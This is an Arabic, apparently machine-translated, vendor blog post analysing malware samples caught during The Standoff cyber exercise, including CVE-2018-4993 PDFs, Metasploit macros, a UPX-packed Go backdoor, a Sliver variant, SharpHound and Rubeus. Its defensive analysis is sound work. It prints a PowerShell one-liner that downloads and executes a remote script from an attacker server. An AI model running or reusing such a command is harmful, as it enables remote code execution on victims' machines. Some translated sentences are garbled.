هاجم تسعة وعشرون فريقًا البنية التحتية ، سعيًا إلى إدراك مخاطر الأعمال الخطرة على مختلف الشركات العاملة في المدينة ، بينما قامت الفرق الستة الأخرى بمراقبة ودراسة نشاط المهاجمين ، وتدريب مهاراتهم على مواجهة الحوادث والتحقيق فيها. بشكل عام ، كل شيء يشبه الحياة. على الرغم من أنه بالإضافة إلى المهاجمين والمدافعين ، كان هناك أيضًا طرف ثالث يراقب عن كثب أفعالهم - SOC العالمية (اقرأ المزيد عنها في مقالتنا الأخرى ). تجمع SOC الملقب بالأخ الأكبر ، العديد من فرق PT Expert Security Center، التي تحلل الأحداث بدون توقف باستخدام معدات الحماية الخاصة. كان أحد هذه الفرق هو قسم اكتشاف البرامج الضارة ، والذي استخدم PT Sandbox للقبض على Redtimer Trojans والتحقيق فيها. تذكر أن PT Sandbox يمكنها:
• مسح ملف باستخدام قواعد PT ESC ،
• فحص ملف باستخدام محركات بائعي مكافحة الفيروسات الخارجيين ،
• اكتشاف النشاط الضار بعد الإطلاق في بيئة معزولة بقواعد سلوكية ،
• تحليل حركة مرور الشبكة باستخدام قواعد اكتشاف هجوم الشبكة ،
• تحليل عمليات تفريغ العملية باستخدام قواعد PT ESC ...
سنخبرك اليوم بما تمكنا من التقاطه وكيف تمكنا من ذلك ، بالإضافة إلى ما اكتشفناه بشكل خاص.
مجموع احصائيات
خلال الأنشطة النشطة على The Standoff (من 12:00 يوم 12 نوفمبر إلى 15:00 يوم 17 نوفمبر) ، اكتشف PT Sandbox برامج ضارة في 8609 ملفًا. دخلت مثل هذه الملفات إلى نظام التحليل بطريقتين:
• من حركة المرور التي تم اعتراضها بواسطة PT Network Attack Discovery ؛
• من خوادم البريد في البنية التحتية للمدينة FF - عند تحليل المرفقات بالحروف.
تم العثور على ما يقرب من نصف جميع أحصنة طروادة التي تم الاستيلاء عليها ليلة 15-16 نوفمبر.
لقد أنجزنا قدرًا هائلاً من العمل للتحقق من صحة الكائنات المكتشفة ؛ قمنا بتعيين كل عينة لمجموعة واحدة أو أخرى. بمعنى آخر ، تم تصنيف جميع البرامج الضارة حسب العائلة.
في البنى التحتية الحقيقية ، لا توجد وفرة من الهجمات لكل وحدة زمنية كما كانت خلال معركة إلكترونية. بالإضافة إلى ذلك ، فإن ملف المهاجمين في البرية أوسع: يتم استخدام المزيد من الأدوات المختلفة ، بما في ذلك تلك التي تركز على بعض الإجراءات المحددة (على سبيل المثال ، للحصول على مكاسب مالية أو التجسس الإلكتروني). ومع ذلك ، من وجهة نظر فئات البرامج الضارة المقدمة ، فإن الصورة معقولة تمامًا. في الهجمات النموذجية ، يسود استخدام الثغرات الأمنية في البرامج الشائعة وبرامج التحميل الوسيطة (stagers) للوصول الأساسي.
دعونا نجمع المزيد من التحليل للرسم البياني الناتج مع تحليل بعض العينات.
CVE-2018-4993
كان ما يقرب من نصف البرامج الضارة عبارة عن مستندات PDF تحتوي على ثغرات أمنية ل CVE-2018-4993 في Adobe Acrobat Reader. تكمن الثغرة الأمنية في الاتصال التلقائي بخادم بعيد باستخدام بروتوكول SMB. نتيجة لهذا الاتصال ، يمكن للمهاجم تلقي استجابة Net-NTLM من الضحية لتحدي Net-NTLM مُعد خصيصًا.
MD5: 484e1fe323ad4696f252a142d97be2c2 من
خلال التطوير الناجح للأحداث ، يمكن للمهاجم استرداد بيانات اعتماد الضحية عن طريق تعداد القيم المحتملة (القوة الغاشمة) أو استخدام اتصالات الشبكة لمهاجمة NTLM-relay .
يوضح الشكل أدناه مثالاً لما رأيناه في الواقع عند اكتشاف مستند ضار باسم غير ضار تمامًا goodpdf.pdf.
لاحظ أنه خلال 123 ساعة ، واجهنا حالات استخدام أداة Responder ، والتي يستخدمها المهاجمون ، على وجه الخصوص ، لهجوم NTLM-relay المذكور أعلاه.
MD5: 9bcec68fd23e12e09a89948ae4483e62
ميتاسبلويت
نسبنا حوالي ثلث البرامج الضارة التي تم تحليلها إلى هذه الفئة. يتضمن هذا جميع أشكال الحمولة التي تم إنشاؤها باستخدام Metasploit ، وهو أشهر مشروع اختبار الاختراق الذي لا يحتاج إلى ارتباط تشعبي ؛) سأضيف أننا هنا قمنا بحساب الحالات التي لم نقم فيها بتأكيد استخدام أي حمولة معينة. لنأخذ إحدى العينات كمثال.
MD5: f7a8f6169df5b399cdac045e610b90f1
تم اعتراض ملف يحمل اسمًا مشبوهًا killerqueen.xlsm في حركة مرور الشبكة. هذا مستند Excel Office جديد به ماكرو.
يسمح لنا كود الماكرو المستخرج بالحكم على بدء سلسلة رسائل جديدة برمز مستقل موضعيًا فور فتح المستند.
نحصل على قائمة مفككة لمخزن البيانات المؤقت ، والذي يتم نقل التحكم إليه ، ونتأكد من وجود كود قابل للتنفيذ أمامنا.
وفي تمثيل البايت ، يتم بسهولة التقاط السلاسل المقروءة لعامل المستخدم المستخدم لطلبات HTTP وعنوان IP للمهاجمين.
ومع ذلك ، تم اكتشاف العينة بواسطة PT Sandbox بسبب استخدام الماكرو في مرحلة مبكرة ، قبل كل هذه التعديلات.
Goagent
في 13 نوفمبر الساعة 07:46 بتوقيت موسكو ، وجدنا عينة مثيرة للاهتمام. في البداية ، تم تحديد مستوى معين من التهديد في حركة مرور الشبكة غير الطبيعية أثناء التحليل السلوكي ، ونتيجة لذلك تلقت العينة حكم أداة التنزيل Trojan. ولكن الأمر الأكثر إثارة للاهتمام أثناء التحليل الساكن هو إطلاق قاعدة YARA الخاصة ، والتي تحدد الحالات غير القانونية لاستخدام وحدة حزم UPX .
MD5: 298fc6e08c81e40a166c62bab42459af
خصوصية استخدام غلاف UPX هو عدم وجود أسماء أقسام يتم توفيرها بواسطة الإصدار القياسي. ومع ذلك ، ظل رمز التعبئة دون تغيير. في الشكل أدناه أيضًا ، يمكنك رؤية قطعة أثرية أخرى - الإصدار 3.96 من UPX packer.
يجب أن يكون القارئ اليقظ قد لاحظ أداة أخرى في الشكل: العينة مكتوبة بلغة Go ، التي تكتسب شعبية في كل مكان.
بعد تحليل العينة ، لم نجد أكوادها المصدرية في المصادر العامة. ومع ذلك ، فإن قدراته تتوافق مع مجموعة أدوات الرجل النبيل للتحكم عن بعد بجهاز كمبيوتر الضحية:
• إنشاء ملفات ،
• الحصول على الدليل الحالي ،
• الحصول على محتويات الدليل الحالي ،
• تغيير الدليل ،
• تنزيل البيانات على كمبيوتر الضحية ،
• تنزيل البيانات من كمبيوتر الضحية ،
• تنفيذ الأوامر عبر shell (cmd.exe في حالة Windows) ،
• تشفير البيانات المرسلة إلى خادم التحكم باستخدام RC4.
يجب أن يقال أن هذا الباب الخلفي يمكن أن يعمل أيضًا كوكيل: من خلال قنوات Go ، يمكنه تلقي البيانات وإرسالها إلى خادم التحكم ، ويلعب دور المنسق للإضافات الإضافية التي توسع قدراته.
أود أن أشير إلى أننا قمنا بتحليل هذا الباب الخلفي بسرعة ، وتحسين القواعد السلوكية - واكتشفنا بنجاح تعديلاته الأخرى أثناء التحليل السلوكي.
بالطبع ، وجدنا إصدارًا مشابهًا من Trojan ، ولكن تم تجميعه لنظام Linux ، وبنفس الخصوصية: على الرغم من العبوة ، يفتقر رأس PE أيضًا إلى ذكر UPX. ها هي الفائدة الواضحة لاستخدام لغة برمجة مترجمة!
أخرى ، لكنها ليست أقل إثارة للاهتمام
دعونا نلقي نظرة سريعة على بعض العائلات الأخرى ، حيث كان هناك عدد أقل بكثير من العينات ، ولكن هذا لم يقل فضولهم.
MD5: f198d4402dc38620c5a75067a0ed568a باب خلفي
آخر. هذه المرة ، ومع ذلك ، لم يتم حزمها ، ولكن تم تشفير جميع السلاسل المستخدمة باستخدام عملية XOR بمفتاح يكون طوله هو نفسه طول السلسلة.
بعد إلغاء التعتيم ، توصلنا إلى أن هذا هو تباين في إطار عمل ما بعد الاستغلال Sliver المتاح للجمهور مع خفض جزئي للتفاعل مع خادم الأوامر.
تم الحصول على عينة أخرى في سلسلة الإجراءات التالية. تم تحليل برنامج نصي من سطر واحد لـ PowerShell:
powerhell -c "IEX (New-Object System.Net.WebClient) .DownloadString ('http: //*.*.34.54: 8000 / s5.ps1')"
نتيجة للتشغيل من خادم الأوامر والتحكم ، تم استلام البرنامج النصي PowerShell مرة أخرى ، ولكن أكبر بكثير.
يتم ضغط الحمولة باستخدام Deflate وإعادة تشفيرها باستخدام Base64.
والنتيجة هي غرس إطار عمل ما بعد الإنتاج على ميثاق NET .
MD5: 8a97322e3c0245c57b231417b060eec9
وهنا مثال على غلاف عكسي PowerShell بسيط ولكنه عملي.
MD5: aaebe541fa164e77e2f90c9e67dbbaca
بسيط ولكنه فعال.
وبطبيعة الحال، فإننا لا يمكن أن نغفل ذكر أدوات للترويج داخل الشبكة - SharpHound و Rubeus .
MD5: 513d35b572b05caa1571a48db1ae24de
MD5: 98382aae04b763f096a3b868d9ba70fe كان من
الأمور ذات الأهمية الخاصة ملاحظة المخيلة التي أظهرها المهاجمون من حيث الأسماء:
***
لذلك ، إذا قمنا بتلخيص عملنا وعمل أدواتنا خلال
كل حالة ثالثة: ثلاثة بائعين خارجيين غابوا عن البرامج الضارة ؛
• تقنيات الكشف الاستاتيكي والسلوكي لم تكمل PT ESC بشكل كبير مجموعة وسائل الحماية التقليدية فحسب ، بل أظهرت أيضًا مستوى لائقًا من الكشف.
في الواقع ، تؤكد هذه الصورة مرة أخرى أن استخدام المعرفة والتقنيات والأساليب المتنوعة للخبراء في الكشف يزيد بشكل كبير من مستوى اكتشاف البرامج الضارة. نفس الفكرة تنطبق على استخدام مجموعة من الحلول من فئات مختلفة ، مما يزيد من مستوى أمن المعلومات بشكل عام.
تم النشر بواسطة Alexey Vishnyakov ، رئيس اكتشاف البرامج الضارة في شركة Positive Technologies